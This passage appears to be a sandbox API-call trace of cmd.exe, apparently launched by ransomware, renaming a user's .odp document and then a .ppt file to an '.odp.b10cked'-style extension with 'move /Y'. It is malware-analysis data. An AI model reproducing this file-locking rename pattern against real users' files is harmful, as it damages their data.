RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x0, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegCloseKey (hKey=0x40) returned 0x0 [0235.158] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ea5c | out: phkResult=0x28ea5c*=0x40) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x0, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x9, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x9, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x9, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegCloseKey (hKey=0x40) returned 0x0 [0235.159] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.159] srand (_Seed=0x5b8863c2) [0235.159] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"" [0235.159] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"" [0235.159] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.159] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.159] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.159] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.159] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.159] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.159] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.159] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.159] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.159] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.159] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.159] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.159] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.159] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.160] GetEnvironmentStringsW () returned 0x82300* [0235.160] FreeEnvironmentStringsW (penv=0x82300) returned 1 [0235.160] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.160] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.160] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.160] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.160] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.160] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.160] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.160] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.160] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.160] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f828 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f828, lpFilePart=0x28f824 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f824*="Desktop") returned 0x18 [0235.160] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.160] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f5a4 | out: lpFindFileData=0x28f5a4) returned 0x80040 [0235.160] FindClose (in: hFindFile=0x80040 | out: hFindFile=0x80040) returned 1 [0235.160] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f5a4 | out: lpFindFileData=0x28f5a4) returned 0x80040 [0235.161] FindClose (in: hFindFile=0x80040 | out: hFindFile=0x80040) returned 1 [0235.161] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f5a4 | out: lpFindFileData=0x28f5a4) returned 0x80040 [0235.161] FindClose (in: hFindFile=0x80040 | out: hFindFile=0x80040) returned 1 [0235.161] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.161] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.161] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.161] GetEnvironmentStringsW () returned 0x82b20* [0235.161] FreeEnvironmentStringsW (penv=0x82b20) returned 1 [0235.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.162] GetConsoleOutputCP () returned 0x1b5 [0235.162] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.162] GetUserDefaultLCID () returned 0x409 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f968, cchData=128 | out: lpLCData="0") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f968, cchData=128 | out: lpLCData="0") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f968, cchData=128 | out: lpLCData="1") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.162] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.162] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.163] GetConsoleTitleW (in: lpConsoleTitle=0x70900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.163] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.164] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.164] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.164] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.164] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.164] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.164] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.164] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.164] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.164] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.164] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.167] GetConsoleTitleW (in: lpConsoleTitle=0x28f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.167] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.167] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.167] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.167] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.167] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.168] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.168] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.168] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.168] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.168] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.168] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.168] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.168] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.168] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.168] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.168] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.168] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.168] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.168] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.168] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.168] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.168] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.168] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.168] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.168] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.169] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f41c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f414, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f414*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.170] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.171] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.171] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2=".") returned 63 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2="..") returned 63 [0235.171] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d~1.odp")) returned 0x20 [0235.171] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.171] SetErrorMode (uMode=0x0) returned 0x0 [0235.171] SetErrorMode (uMode=0x1) returned 0x0 [0235.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", nBufferLength=0x104, lpBuffer=0x28eda4, lpFilePart=0x28ed8c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", lpFilePart=0x28ed8c*="MMWJ0D~1.ODP") returned 0x2f [0235.171] SetErrorMode (uMode=0x0) returned 0x1 [0235.171] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2=".") returned 63 [0235.171] _wcsicmp (_String1="MMWJ0D~1.ODP", _String2="..") returned 63 [0235.171] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d~1.odp")) returned 0x20 [0235.172] SetErrorMode (uMode=0x0) returned 0x0 [0235.172] SetErrorMode (uMode=0x1) returned 0x0 [0235.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", nBufferLength=0x104, lpBuffer=0x28f220, lpFilePart=0x28efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", lpFilePart=0x28efb8*="MMWJ0D~1.ODP") returned 0x2f [0235.172] SetErrorMode (uMode=0x0) returned 0x1 [0235.172] SetErrorMode (uMode=0x0) returned 0x0 [0235.172] SetErrorMode (uMode=0x1) returned 0x0 [0235.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", nBufferLength=0x104, lpBuffer=0x28f428, lpFilePart=0x28efb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", lpFilePart=0x28efb8*="Mmwj0D0mDfuQB5wXA.odp.b10cked") returned 0x40 [0235.172] SetErrorMode (uMode=0x0) returned 0x1 [0235.172] SetLastError (dwErrCode=0x0) [0235.172] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp.b10cked")) returned 0xffffffff [0235.172] GetLastError () returned 0x2 [0235.172] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x28e934, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e934) returned 0x70ef0 [0235.172] FindNextFileW (in: hFindFile=0x70ef0, lpFindFileData=0x28e934 | out: lpFindFileData=0x28e934) returned 0 [0235.173] GetLastError () returned 0x12 [0235.173] FindClose (in: hFindFile=0x70ef0 | out: hFindFile=0x70ef0) returned 1 [0235.174] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x81c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81c30) returned 0x70ef0 [0235.174] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", nBufferLength=0x104, lpBuffer=0x28ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked", lpFilePart=0x0) returned 0x40 [0235.174] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp", nBufferLength=0x104, lpBuffer=0x28ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp", lpFilePart=0x0) returned 0x38 [0235.174] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp")) returned 0x20 [0235.174] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\mmwj0d0mdfuqb5wxa.odp.b10cked"), dwFlags=0x3) returned 1 [0235.176] FindClose (in: hFindFile=0x70ef0 | out: hFindFile=0x70ef0) returned 1 [0235.176] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28eb80 | out: _Buffer=" 1") returned 9 [0235.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.176] GetFileType (hFile=0x7) returned 0x2 [0235.386] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28eb0c | out: lpMode=0x28eb0c) returned 1 [0235.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28eb40 | out: lpConsoleScreenBufferInfo=0x28eb40) returned 1 [0235.386] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.387] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x28eb80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28eb64, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x28eb64*=0x1a) returned 1 [0235.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.387] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.387] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.387] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.387] SetConsoleInputExeNameW () returned 0x1 [0235.387] GetConsoleOutputCP () returned 0x1b5 [0235.387] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.387] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.388] exit (_Code=0) Process: id = "637" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35078 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35079 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 